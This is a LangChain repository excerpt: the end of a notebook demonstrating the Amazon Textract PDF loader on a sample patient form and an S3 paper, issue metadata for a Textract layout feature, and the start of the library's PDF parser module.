[DetectDocumentText](https://docs.aws.amazon.com/textract/latest/dg/API_DetectDocumentText.html). \n", "\n", "Local files or URL endpoints like HTTP:// are limited to one page documents for Textract.\n", "Multi-page documents have to reside on S3. This sample file is a jpeg." ] }, { "cell_type": "code", "execution_count": 9, "id": "1becee92-e82f-42d4-9b4e-b23d77cbe88d", "metadata": { "tags": [] }, "outputs": [], "source": [ "from langchain.document_loaders import AmazonTextractPDFLoader\n", "\n", "loader = AmazonTextractPDFLoader(\"example_data/alejandro_rosalez_sample-small.jpeg\")\n", "documents = loader.load()" ] }, { "cell_type": "markdown", "id": "d566dc56-c9a9-44ec-84fb-a81928f90d40", "metadata": {}, "source": [ "Output from the file" ] }, { "cell_type": "code", "execution_count": 10, "id": "1272ce8c-d298-4059-ac0a-780bf5f82302", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No ', metadata={'source': 'example_data/alejandro_rosalez_sample-small.jpeg', 'page': 1})]" ] }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "source": [ "documents" ] }, { "cell_type": "markdown", "id": "4cf7f19c-3635-453a-9c76-4baf98b8d7f4", "metadata": {}, "source": [ "## Sample 2\n", "The next sample loads a file from an HTTPS endpoint. \n", "It has to be single page, as Amazon Textract requires all multi-page documents to be stored on S3." ] }, { "cell_type": "code", "execution_count": 7, "id": "10374bfb-b325-451f-8bd0-c686710ab68c", "metadata": { "tags": [] }, "outputs": [], "source": [ "from langchain.document_loaders import AmazonTextractPDFLoader\n", "\n", "loader = AmazonTextractPDFLoader(\n", " \"https://amazon-textract-public-content.s3.us-east-2.amazonaws.com/langchain/alejandro_rosalez_sample_1.jpg\"\n", ")\n", "documents = loader.load()" ] }, { "cell_type": "code", "execution_count": 11, "id": "16a2b6a3-7514-4c2c-a427-6847169af473", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No ', metadata={'source': 'example_data/alejandro_rosalez_sample-small.jpeg', 'page': 1})]" ] }, "execution_count": 11, "metadata": {}, "output_type": "execute_result" } ], "source": [ "documents" ] }, { "cell_type": "markdown", "id": "3a9cd8ec-e663-4dc7-9db1-d2f575253141", "metadata": {}, "source": [ "## Sample 3\n", "\n", "Processing a multi-page document requires the document to be on S3. The sample document resides in a bucket in us-east-2 and Textract needs to be called in that same region to be successful, so we set the region_name on the client and pass that in to the loader to ensure Textract is called from us-east-2. You could also to have your notebook running in us-east-2, setting the AWS_DEFAULT_REGION set to us-east-2 or when running in a different environment, pass in a boto3 Textract client with that region name like in the cell below." ] }, { "cell_type": "code", "execution_count": 12, "id": "8185e3e6-9599-4a47-8969-d6dcef3e6404", "metadata": { "tags": [] }, "outputs": [], "source": [ "import boto3\n", "\n", "textract_client = boto3.client(\"textract\", region_name=\"us-east-2\")\n", "\n", "file_path = \"s3://amazon-textract-public-content/langchain/layout-parser-paper.pdf\"\n", "loader = AmazonTextractPDFLoader(file_path, client=textract_client)\n", "documents = loader.load()" ] }, { "cell_type": "markdown", "id": "b8901eec-070d-4fd6-9d65-52211d332441", "metadata": {}, "source": [ "Now getting the number of pages to validate the response (printing out the full response would be quite long...). We expect 16 pages." ] }, { "cell_type": "code", "execution_count": 13, "id": "b23c01c8-cf69-4fe2-8141-4621edb7d79c", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "16" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "len(documents)" ] }, { "cell_type": "markdown", "id": "b3e41b4d-b159-4274-89be-80d8159134ef", "metadata": {}, "source": [ "## Using the AmazonTextractPDFLoader in an LangChain chain (e. g. OpenAI)\n", "\n", "The AmazonTextractPDFLoader can be used in a chain the same way the other loaders are used.\n", "Textract itself does have a [Query feature](https://docs.aws.amazon.com/textract/latest/dg/API_Query.html), which offers similar functionality to the QA chain in this sample, which is worth checking out as well." ] }, { "cell_type": "code", "execution_count": 14, "id": "53c47b24-cc06-4256-9e5b-a82fc80bc55d", "metadata": {}, "outputs": [], "source": [ "# You can store your OPENAI_API_KEY in a .env file as well\n", "# import os\n", "# from dotenv import load_dotenv\n", "\n", "# load_dotenv()" ] }, { "cell_type": "code", "execution_count": 15, "id": "a9ae004c-246c-4c7f-8458-191cd7424a9b", "metadata": { "tags": [] }, "outputs": [], "source": [ "# Or set the OpenAI key in the environment directly\n", "import os\n", "\n", "os.environ[\"OPENAI_API_KEY\"] = \"your-OpenAI-API-key\"" ] }, { "cell_type": "code", "execution_count": 16, "id": "d52b089c-10ca-45fb-8669-8a1c5fee10d5", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "' The authors are Zejiang Shen, Ruochen Zhang, Melissa Dell, Benjamin Charles Germain Lee, Jacob Carlson, Weining Li, Gardner, M., Grus, J., Neumann, M., Tafjord, O., Dasigi, P., Liu, N., Peters, M., Schmitz, M., Zettlemoyer, L., Lukasz Garncarek, Powalski, R., Stanislawek, T., Topolski, B., Halama, P., Gralinski, F., Graves, A., Fernández, S., Gomez, F., Schmidhuber, J., Harley, A.W., Ufkes, A., Derpanis, K.G., He, K., Gkioxari, G., Dollár, P., Girshick, R., He, K., Zhang, X., Ren, S., Sun, J., Kay, A., Lamiroy, B., Lopresti, D., Mears, J., Jakeway, E., Ferriter, M., Adams, C., Yarasavage, N., Thomas, D., Zwaard, K., Li, M., Cui, L., Huang,'" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "from langchain.llms import OpenAI\n", "from langchain.chains.question_answering import load_qa_chain\n", "\n", "chain = load_qa_chain(llm=OpenAI(), chain_type=\"map_reduce\")\n", "query = [\"Who are the autors?\"]\n", "\n", "chain.run(input_documents=documents, question=query)" ] }, { "cell_type": "code", "execution_count": null, "id": "1a09d18b-ab7b-468e-ae66-f92abf666b9b", "metadata": {}, "outputs": [], "source": [] } ], "metadata": { "availableInstances": [ { "_defaultOrder": 0, "_isFastLaunch": true, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 4, "name": "ml.t3.medium", "vcpuNum": 2 }, { "_defaultOrder": 1, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.t3.large", "vcpuNum": 2 }, { "_defaultOrder": 2, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.t3.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 3, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.t3.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 4, "_isFastLaunch": true, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.m5.large", "vcpuNum": 2 }, { "_defaultOrder": 5, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.m5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 6, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.m5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 7, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.m5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 8, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.m5.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 9, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.m5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 10, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.m5.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 11, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.m5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 12, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.m5d.large", "vcpuNum": 2 }, { "_defaultOrder": 13, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.m5d.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 14, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.m5d.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 15, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.m5d.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 16, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.m5d.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 17, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.m5d.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 18, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.m5d.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 19, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.m5d.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 20, "_isFastLaunch": false, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": true, "memoryGiB": 0, "name": "ml.geospatial.interactive", "supportedImageNames": [ "sagemaker-geospatial-v1-0" ], "vcpuNum": 0 }, { "_defaultOrder": 21, "_isFastLaunch": true, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 4, "name": "ml.c5.large", "vcpuNum": 2 }, { "_defaultOrder": 22, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 8, "name": "ml.c5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 23, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.c5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 24, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.c5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 25, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 72, "name": "ml.c5.9xlarge", "vcpuNum": 36 }, { "_defaultOrder": 26, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 96, "name": "ml.c5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 27, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 144, "name": "ml.c5.18xlarge", "vcpuNum": 72 }, { "_defaultOrder": 28, "_isFastLaunch": false, "category": "Compute optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.c5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 29, "_isFastLaunch": true, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.g4dn.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 30, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.g4dn.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 31, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.g4dn.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 32, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.g4dn.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 33, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.g4dn.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 34, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.g4dn.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 35, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 61, "name": "ml.p3.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 36, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 244, "name": "ml.p3.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 37, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 488, "name": "ml.p3.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 38, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 768, "name": "ml.p3dn.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 39, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.r5.large", "vcpuNum": 2 }, { "_defaultOrder": 40, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.r5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 41, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.r5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 42, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.r5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 43, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.r5.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 44, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.r5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 45, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 512, "name": "ml.r5.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 46, "_isFastLaunch": false, "category": "Memory Optimized", "gpuNum": 0, "hideHardwareSpecs": false, "memoryGiB": 768, "name": "ml.r5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 47, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 16, "name": "ml.g5.xlarge", "vcpuNum": 4 }, { "_defaultOrder": 48, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 32, "name": "ml.g5.2xlarge", "vcpuNum": 8 }, { "_defaultOrder": 49, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 64, "name": "ml.g5.4xlarge", "vcpuNum": 16 }, { "_defaultOrder": 50, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 128, "name": "ml.g5.8xlarge", "vcpuNum": 32 }, { "_defaultOrder": 51, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 1, "hideHardwareSpecs": false, "memoryGiB": 256, "name": "ml.g5.16xlarge", "vcpuNum": 64 }, { "_defaultOrder": 52, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 192, "name": "ml.g5.12xlarge", "vcpuNum": 48 }, { "_defaultOrder": 53, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 4, "hideHardwareSpecs": false, "memoryGiB": 384, "name": "ml.g5.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 54, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 768, "name": "ml.g5.48xlarge", "vcpuNum": 192 }, { "_defaultOrder": 55, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 1152, "name": "ml.p4d.24xlarge", "vcpuNum": 96 }, { "_defaultOrder": 56, "_isFastLaunch": false, "category": "Accelerated computing", "gpuNum": 8, "hideHardwareSpecs": false, "memoryGiB": 1152, "name": "ml.p4de.24xlarge", "vcpuNum": 96 } ], "instance_type": "ml.t3.medium", "kernelspec": { "display_name": "Python 3 (ipykernel)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.11.1" } }, "nbformat": 4, "nbformat_minor": 5 }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints. Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call ### Motivation Improve downstream LLM accuracy ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/langchain/document_loaders/parsers/pdf.py
"""Module contains common parsers for PDFs.""" from __future__ import annotations import warnings from typing import ( TYPE_CHECKING, Any, Iterable, Iterator, Mapping, Optional, Sequence, Union, ) from urllib.parse import urlparse import numpy as np from langchain.document_loaders.base import BaseBlobParser from langchain.document_loaders.blob_loaders import Blob from langchain.schema import Document if TYPE_CHECKING: import fitz.fitz import pdfminer.layout import pdfplumber.page import pypdf._page import pypdfium2._helpers.page _PDF_FILTER_WITH_LOSS = ["DCTDecode", "DCT", "JPXDecode"] _PDF_FILTER_WITHOUT_LOSS = [ "LZWDecode", "LZW", "FlateDecode", "Fl", "ASCII85Decode", "A85", "ASCIIHexDecode", "AHx", "RunLengthDecode", "RL", "CCITTFaxDecode", "CCF", "JBIG2Decode", ] def extract_from_images_with_rapidocr( images: Sequence[Union[Iterable[np.ndarray], bytes]] ) -> str: """Extract text from images with RapidOCR. Args: images: Images to extract text from. Returns: Text extracted from images. Raises: ImportError: If `rapidocr-onnxruntime` package is not installed. """ try: from rapidocr_onnxruntime import RapidOCR except ImportError: raise ImportError( "`rapidocr-onnxruntime` package not found, please install it with " "`pip install rapidocr-onnxruntime`" ) ocr = RapidOCR() text = "" for img in images: result, _ = ocr(img) if result: result = [text[1] for text in result] text += "\n".join(result) return text class PyPDFParser(BaseBlobParser): """Load `PDF` using `pypdf`""" def __init__( self, password: Optional[Union[str, bytes]] = None, extract_images: bool = False ): self.password = password self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import pypdf with blob.as_bytes_io() as pdf_file_obj: pdf_reader = pypdf.PdfReader(pdf_file_obj, password=self.password) yield from [ Document( page_content=page.extract_text() + self._extract_images_from_page(page), metadata={"source": blob.source, "page": page_number}, ) for page_number, page in enumerate(pdf_reader.pages) ] def _extract_images_from_page(self, page: pypdf._page.PageObject) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images or "/XObject" not in page["/Resources"].keys(): return "" xObject = page["/Resources"]["/XObject"].get_object() images = [] for obj in xObject: if xObject[obj]["/Subtype"] == "/Image": if xObject[obj]["/Filter"][1:] in _PDF_FILTER_WITHOUT_LOSS: height, width = xObject[obj]["/Height"], xObject[obj]["/Width"] images.append( np.frombuffer(xObject[obj].get_data(), dtype=np.uint8).reshape( height, width, -1 ) ) elif xObject[obj]["/Filter"][1:] in _PDF_FILTER_WITH_LOSS: images.append(xObject[obj].get_data()) else: warnings.warn("Unknown PDF Filter!") return extract_from_images_with_rapidocr(images) class PDFMinerParser(BaseBlobParser): """Parse `PDF` using `PDFMiner`.""" def __init__(self, extract_images: bool = False): self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" if not self.extract_images: from pdfminer.high_level import extract_text with blob.as_bytes_io() as pdf_file_obj: text = extract_text(pdf_file_obj) metadata = {"source": blob.source} yield Document(page_content=text, metadata=metadata) else: import io from pdfminer.converter import PDFPageAggregator, TextConverter from pdfminer.layout import LAParams from pdfminer.pdfinterp import PDFPageInterpreter, PDFResourceManager from pdfminer.pdfpage import PDFPage text_io = io.StringIO() with blob.as_bytes_io() as pdf_file_obj: pages = PDFPage.get_pages(pdf_file_obj) rsrcmgr = PDFResourceManager() device_for_text = TextConverter(rsrcmgr, text_io, laparams=LAParams()) device_for_image = PDFPageAggregator(rsrcmgr, laparams=LAParams()) interpreter_for_text = PDFPageInterpreter(rsrcmgr, device_for_text) interpreter_for_image = PDFPageInterpreter(rsrcmgr, device_for_image) for i, page in enumerate(pages): interpreter_for_text.process_page(page) interpreter_for_image.process_page(page) content = text_io.getvalue() + self._extract_images_from_page( device_for_image.get_result() ) text_io.truncate(0) text_io.seek(0) metadata = {"source": blob.source, "page": str(i)} yield Document(page_content=content, metadata=metadata) def _extract_images_from_page(self, page: pdfminer.layout.LTPage) -> str: """Extract images from page and get the text with RapidOCR.""" import pdfminer def get_image(layout_object: Any) -> Any: if isinstance(layout_object, pdfminer.layout.LTImage): return layout_object if isinstance(layout_object, pdfminer.layout.LTContainer): for child in layout_object: return get_image(child) else: return None images = [] for img in list(filter(bool, map(get_image, page))): if img.stream["Filter"].name in _PDF_FILTER_WITHOUT_LOSS: images.append( np.frombuffer(img.stream.get_data(), dtype=np.uint8).reshape( img.stream["Height"], img.stream["Width"], -1 ) ) elif img.stream["Filter"].name in _PDF_FILTER_WITH_LOSS: images.append(img.stream.get_data()) else: warnings.warn("Unknown PDF Filter!") return extract_from_images_with_rapidocr(images) class PyMuPDFParser(BaseBlobParser): """Parse `PDF` using `PyMuPDF`.""" def __init__( self, text_kwargs: Optional[Mapping[str, Any]] = None, extract_images: bool = False, ) -> None: """Initialize the parser. Args: text_kwargs: Keyword arguments to pass to ``fitz.Page.get_text()``. """ self.text_kwargs = text_kwargs or {} self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import fitz with blob.as_bytes_io() as file_path: doc = fitz.open(file_path) # open document yield from [ Document( page_content=page.get_text(**self.text_kwargs) + self._extract_images_from_page(doc, page), metadata=dict( { "source": blob.source, "file_path": blob.source, "page": page.number, "total_pages": len(doc), }, **{ k: doc.metadata[k] for k in doc.metadata if type(doc.metadata[k]) in [str, int] }, ), ) for page in doc ] def _extract_images_from_page( self, doc: fitz.fitz.Document, page: fitz.fitz.Page ) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images: return "" import fitz img_list = page.get_images() imgs = [] for img in img_list: xref = img[0] pix = fitz.Pixmap(doc, xref) imgs.append( np.frombuffer(pix.samples, dtype=np.uint8).reshape( pix.height, pix.width, -1 ) ) return extract_from_images_with_rapidocr(imgs) class PyPDFium2Parser(BaseBlobParser): """Parse `PDF` with `PyPDFium2`.""" def __init__(self, extract_images: bool = False) -> None: """Initialize the parser.""" try: import pypdfium2 # noqa:F401 except ImportError: raise ImportError( "pypdfium2 package not found, please install it with" " `pip install pypdfium2`" ) self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import pypdfium2 # pypdfium2 is really finicky with respect to closing things, # if done incorrectly creates seg faults. with blob.as_bytes_io() as file_path: pdf_reader = pypdfium2.PdfDocument(file_path, autoclose=True) try: for page_number, page in enumerate(pdf_reader): text_page = page.get_textpage() content = text_page.get_text_range() text_page.close() content += "\n" + self._extract_images_from_page(page) page.close() metadata = {"source": blob.source, "page": page_number} yield Document(page_content=content, metadata=metadata) finally: pdf_reader.close() def _extract_images_from_page(self, page: pypdfium2._helpers.page.PdfPage) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images: return "" import pypdfium2.raw as pdfium_c images = list(page.get_objects(filter=(pdfium_c.FPDF_PAGEOBJ_IMAGE,))) images = list(map(lambda x: x.get_bitmap().to_numpy(), images)) return extract_from_images_with_rapidocr(images) class PDFPlumberParser(BaseBlobParser): """Parse `PDF` with `PDFPlumber`.""" def __init__( self, text_kwargs: Optional[Mapping[str, Any]] = None, dedupe: bool = False, extract_images: bool = False, ) -> None: """Initialize the parser. Args: text_kwargs: Keyword arguments to pass to ``pdfplumber.Page.extract_text()`` dedupe: Avoiding the error of duplicate characters if `dedupe=True`. """ self.text_kwargs = text_kwargs or {} self.dedupe = dedupe self.extract_images = extract_images def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" import pdfplumber with blob.as_bytes_io() as file_path: doc = pdfplumber.open(file_path) # open document yield from [ Document( page_content=self._process_page_content(page) + "\n" + self._extract_images_from_page(page), metadata=dict( { "source": blob.source, "file_path": blob.source, "page": page.page_number - 1, "total_pages": len(doc.pages), }, **{ k: doc.metadata[k] for k in doc.metadata if type(doc.metadata[k]) in [str, int] }, ), ) for page in doc.pages ] def _process_page_content(self, page: pdfplumber.page.Page) -> str: """Process the page content based on dedupe.""" if self.dedupe: return page.dedupe_chars().extract_text(**self.text_kwargs) return page.extract_text(**self.text_kwargs) def _extract_images_from_page(self, page: pdfplumber.page.Page) -> str: """Extract images from page and get the text with RapidOCR.""" if not self.extract_images: return "" images = [] for img in page.images: if img["stream"]["Filter"].name in _PDF_FILTER_WITHOUT_LOSS: images.append( np.frombuffer(img["stream"].get_data(), dtype=np.uint8).reshape( img["stream"]["Height"], img["stream"]["Width"], -1 ) ) elif img["stream"]["Filter"].name in _PDF_FILTER_WITH_LOSS: images.append(img["stream"].get_data()) else: warnings.warn("Unknown PDF Filter!") return extract_from_images_with_rapidocr(images) class AmazonTextractPDFParser(BaseBlobParser): """Send `PDF` files to `Amazon Textract` and parse them. For parsing multi-page PDFs, they have to reside on S3. 